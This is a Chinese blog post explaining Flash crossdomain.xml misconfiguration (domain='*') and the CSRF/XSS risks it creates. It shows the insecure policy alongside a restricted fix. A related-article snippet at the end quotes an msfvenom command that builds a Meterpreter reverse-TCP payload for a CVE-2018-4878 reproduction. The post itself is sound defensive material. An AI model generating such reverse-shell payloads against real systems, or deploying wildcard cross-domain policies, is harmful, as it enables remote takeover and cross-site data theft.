“Flash配置不当漏洞”详解

最新推荐文章于 2024-04-28 16:19:50 发布
最新推荐文章于 2024-04-28 16:19:50 发布
阅读量1.9k 收藏 4
点赞数 1
分类专栏: 应急响应 文章标签: 前端 javascript java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/128711877
版权
文章讨论了Flash跨域访问可能导致的安全问题,如CSRF和XSS攻击,影响版本为AdobeFlashPlayer28.0.0.137及以下。解决方案包括修改Flash安全策略和crossdomain.xml文件,限制跨域访问。若crossdomain.xml设置为允许所有域,将增加FlashCSRF的风险。网站管理员应检查并严格配置此文件以防止此类攻击。
摘要由CSDN通过智能技术生成

危害

可被用来进行跨域访问,可能会导致“跨站点伪造请求”或“跨站点跟踪”(“跨站点脚本编制”的变体)之类的攻击,从而导致其它用户的信息被非法读取。

导致不受信任的第三方域的flash也能访问当前域的资源,绕过同源策略的限制,可为后续渗透攻击做准备,flash的跨域均可能导致XSS,CSRF等问题。

Flash 显示程序接受 AllowScriptAccess 之类的对象参数。当父 SWF 装入子 SWF,并确定被装入的 SWF 与进行装入的 SWF 是否对 Web 页面脚本有相同的访问权时,会使用 AllowScriptAccess 参数。如果参数设为“always”,父项从任何域中装入的 SWF 都可能将脚本注入托管 Web 页面中。

影响版本

小于或等于 Adobe Flash Player 28.0.0.137 版本

解决方案 

解决方案:

方案1. 修改flash安全策略,做严格限制,比如限制到网站当前域。

方案2. 修改crossdomain.xml文件,找到相应目录下的crossdomain.xml文件。

找到代码:

cross-domain-policy allow-access-from domain=* cross-domain-policy

改成:

cross-domain-policy allow-access-from domain= 改成你的网站地址 cross-domain-policy

Flash CSRF形成的原因 

Flash跨域权限管理文件设置为允许所有主机/域名跨域对本站进行读写数据:

#!xml
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<cross-domain-policy>
    <allow-access-from domain="*"/>
</cross-domain-policy>

Flash跨域权限管理文件过滤规则不严(domain=”*”),导致可以从其它任何域传Flash产生CSRF。

哪些地方存在Flash CSRF(针对网站管理者)

Flash CSRF是因为跨域权限管理文件配置不当而产生的,所以我们可以在根目录打开Crossdomain.xml来查看该网站或者只域名是否存在FLAH的CSRF:

http://www.xxx.com/crossdomain.xml

发现如下代码就说明可能存在Flash CSRF

#!xml
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

仲瑿
关注
专栏目录
flash跨域策略文件crossdomain.xml配置详解
chen8511的专栏
08-19 870
flash在跨域时唯一的限制策略就是crossdomain.xml文件,该文件限制了flash是否可以跨域读写数据以及允许从什么地方跨域读写数据。 位于www.a.com域中的SWF文件要访问www.b.com的文件时,SWF首先会检查www.b.com服务器目录下是否有crossdomain.xml文件,如果没有,则访问不成功;若crossdomain.xml文件存在,且里边设置了允许
Adobe Flash爆出严重漏洞:可导致代码任意执行 获取个人隐私
qq_41679358的博客
08-03 753
文章目录[隐藏] Adobe 被爆出的漏洞:受影响的产品版本升级修复版本其他漏洞受影响的产品版本升级修复版本 众所周知,Flash是网络攻击的首选目标。值得注意的是,Adobe在2017年7月宣布计划将Flash推入使用寿命终止状态,这意味着它将在今年年底不再更新或分发Flash Player。不过仍然在使用Adobe的用户需要警惕,因为Adobe 在今年5月被爆出了多个严重漏洞,好在Ado...
垂死挣扎的 Flash Player 再爆零日漏洞,影响多个平台
程序员观察
02-04 971
转自:https://www.oschina.net/news/93070/ecmascript-2018-specificationAdobe Flash Player 自发布以来,就频频被曝出存在大量的严重安全漏洞。随着时代发展,这个曾风光一时的浏览器插件日渐势衰,目前已摇摇欲坠垂死挣扎。据外媒报道,韩国计算机应急响应小组(KR-CERT)2月1日发布了一个有关 Flash Player 的
flash跨域劫持漏洞
xixixi
09-13 2745
参考资料1 参考资料2 Adobe Flash 2017年7月25号,在官方博客上宣布到2020年底停止更新Flash,鼓励开发者尽早使用新的标准( HTML5、WebGL 和 WebAssembly)进行开发 ActionScript:(简称AS)是由Macromedia(现已被Adobe收购)为其Flash产品开发的,最初是一种简单的脚本语言,现在最新版本ActionScript...
Flash 0day漏洞(CVE-2018-4878复现)
weixin_44897902的博客
10-14 477
漏洞名:CVE-2018-4878 危害:造成远程命令执行 影响范围:Flash Player28.0.0.137及以前的所有版本 准备工作: kail: 192.168.91.146 win7,Flash Player28.0.0.137,IE8 这是一位前辈的Player: 链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 事...
Flash漏洞(CVE-2018-4878 )复现
玄道的网安博客
07-29 1410
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
flash跨域策略文件crossdomain.xml配置详解以及防范措施.docx
04-27
0x03 防范措施与最佳实践为了确保站点安全,避免因配置不当引发的跨域安全问题,应遵循以下建议: 1. 不要使用 allow-access-from domain="*" 的配置,除非明确知道这样做是安全的。 2. 限制允许访问的源域,最好...
csrf&ssrf漏洞详解
weixin_56714714的博客
07-25 1514
CSRF 什么是CSRF? 跨站请求伪造也叫CSRF/XSRF 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。如下:其中Web A为存在CSRF漏洞的网站,Web B为攻击者构建的恶意网站,User C为Web A网站的合法用户。 CSRF攻击的危害 CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求 CSRF危害:以你的名义发送邮件,发
XSS详解
聚鼎安全
01-20 791
目录XSS简介XSS漏洞分类XSS漏洞攻击过程XSS漏洞危害XSS漏洞的挖掘XSS利用方式XSS过滤绕过XSS防御方式XSS工具手工挖掘工具自动化工具 XSS简介 跨站脚本攻击—XSS(Cross Site Script),是指攻击者通过在Web页面中写入恶意脚本,造成用户在浏览页面时,控制用户浏览器进行操作的攻击方式,该漏洞发生在用户端,在渲染过程中发生了不在预期过程中的JavaScript代码执行。假设,在一个服务端上,有一处功能使用了这段代码,他的功能是将用户输入的内容输出到页面上,很常见的一个功能。
LABVIEW插入FLASH
11-21
由于ActiveX控件具有较高的权限,如果使用不当可能会导致安全漏洞。因此,在选择和配置控件时应当遵循最佳实践,避免引入不必要的风险。 4. **性能优化**:尽管FLASH提供了丰富的视觉效果,但在实际应用中也可能...
flash漏洞利用CVE-2018-4878
06-14
flash漏洞利用CVE-2018-4878。 。。。
Flash跨域访问
07-30
NULL 博文链接:https://can4you.iteye.com/blog/829419
XSS与CSRF详解
Sylon的博客
06-24 2847
XSS与CSRF详解 随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显。 黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则...
关于flash的跨域问题
zhytry的博客
03-23 1433
Security.allowDomain("*"); Security.allowInsecureDomain("*");   Security.loadPolicyFile("http://py.qlogo.cn/crossdomain.xml");   在过游戏开发的时候,往往会遇到安全域的问题,然而这个问题,确实实实在在的困扰着我们
运行Adobe精简版系列软件出现配置错误:16解决办法
最新发布
2301_76755223的博客
04-28 1244
网上下载的Adobe精简版系列软件,如PS,AI,FLASH等等,出现配置错误,请卸载并重新安装该产品。如果此问题仍然存在,请与Adobe技术支持联系以获得帮助,并提供屏幕下方显示的错误代码。错误:16。
Adobe证实Flash危险漏洞:涉及所有版本
weixin_34319999的博客
10-16 114
2019独角兽企业重金招聘Python工程师标准>>> ...
漏洞复现】Adobe Flash Player安装程序的漏洞|Flash 0day(CVE-2018-15982)
VI___
01-13 522
一、CVE-2018-15982 ——任意代码执行漏洞 2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 ...
Adobe Flash Player漏洞一堆真要命 绿盟科技安全威胁通告给建议
weixin_34223655的博客
09-01 307
前面Adobe Acrobat Reader刚爆出一堆高危漏洞,Adobe Flash Player也有了一堆漏洞,危害涉及拒绝服务、代码执行等方面,绿盟科技发布了《Adobe Flash Player多个漏洞安全威胁通告》,通告全文如下 2017年2月14日,Adobe官网发布漏洞安全通告,影响到24.0.0.194及更早版本的Flash Pl...
Windows Build:提升系统性能,修复Flash漏洞
DcCode的博客
10-10 68
Windows Build版本通过提升系统性能和修复Flash漏洞,为用户提供了更好的计算体验和更高的安全性。近期发布的Windows Build版本将带来一系列重要的更新,旨在提升系统性能并修复Flash漏洞。本文将详细介绍这些更新的内容,并附上相应的源代码示例。在这个示例中,我们使用了HTML代码来展示一条消息,鼓励用户升级到具有修复Flash漏洞功能的最新Windows Build版本。通过使用Windows Build版本中的性能优化功能,系统可以更高效地执行这个计算任务,并提供更短的执行时间。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值